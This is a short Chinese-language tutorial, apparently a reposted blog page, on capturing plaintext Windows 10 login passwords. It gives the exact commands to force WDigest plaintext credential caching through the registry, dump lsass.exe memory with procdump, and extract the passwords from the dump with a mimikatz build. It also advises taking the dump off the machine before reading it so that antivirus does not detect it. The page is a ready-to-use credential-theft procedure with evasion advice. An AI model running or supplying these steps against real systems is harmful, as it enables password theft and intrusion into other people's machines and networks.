Windows10明文密码抓取

procdump+mimikatz获取win10用户明文密码

测试环境:Win10 企业版LTSC 1809

工具下载:k8版本的mz64.exe、procdumpv9.0

原理:获取到内存文件lsass.exe进程(它用于本地安全和登陆策略)中存储的明文登录密码

利用前提:拿到了admin权限的cmd,管理员用密码登录机器,并运行了lsass.exe进程,把密码保存在内存文件lsass进程中

抓取明文:修改注册表,等待系统重新登录,截取dmp文件

1、先修改注册表

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

修改完之后,重新登录账号,此时抓出来的密码就是明文显示。

在默认情况下,当系统为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,如下图,密码字段显示为null,此时可以通过修改注册表的方式抓取明文,但需要用户重新登录后才能成功抓取。

Windows10明文密码抓取_第1张图片

2、重登系统后,抓取dmp文件

管理员权限运行

procdump64.exe -accepteula -ma lsass.exe 1.dmp

Windows10明文密码抓取_第2张图片

也可以在任务管理器中导出文件,这里需要注意AppData隐藏文件夹

Windows10明文密码抓取_第3张图片

3、把dmp文件导出到本地使用mimikatz读取密码

我这里是直接在机器上运行mimikatz读取密码了,在实际运用中一般会导出到本地再读取密码,这样才能躲避杀软检测流量特征。对了,这里需要注意的是,一开始我是用官方2.2.0、2.1.1版本的mz通通报错,google发现这应该是跟mz版本还有win10版本有关。

Windows10明文密码抓取_第4张图片

mz64.exe "sekurlsa::minidump 1.dmp" "sekurlsa::logonPasswords full" exit

这里我用了k8的mz才没有报错,成功读出win10的明文密码

Windows10明文密码抓取_第5张图片

 

 

你可能感兴趣的:(内网渗透,Windows,mimikatz,密码抓取,内网渗透)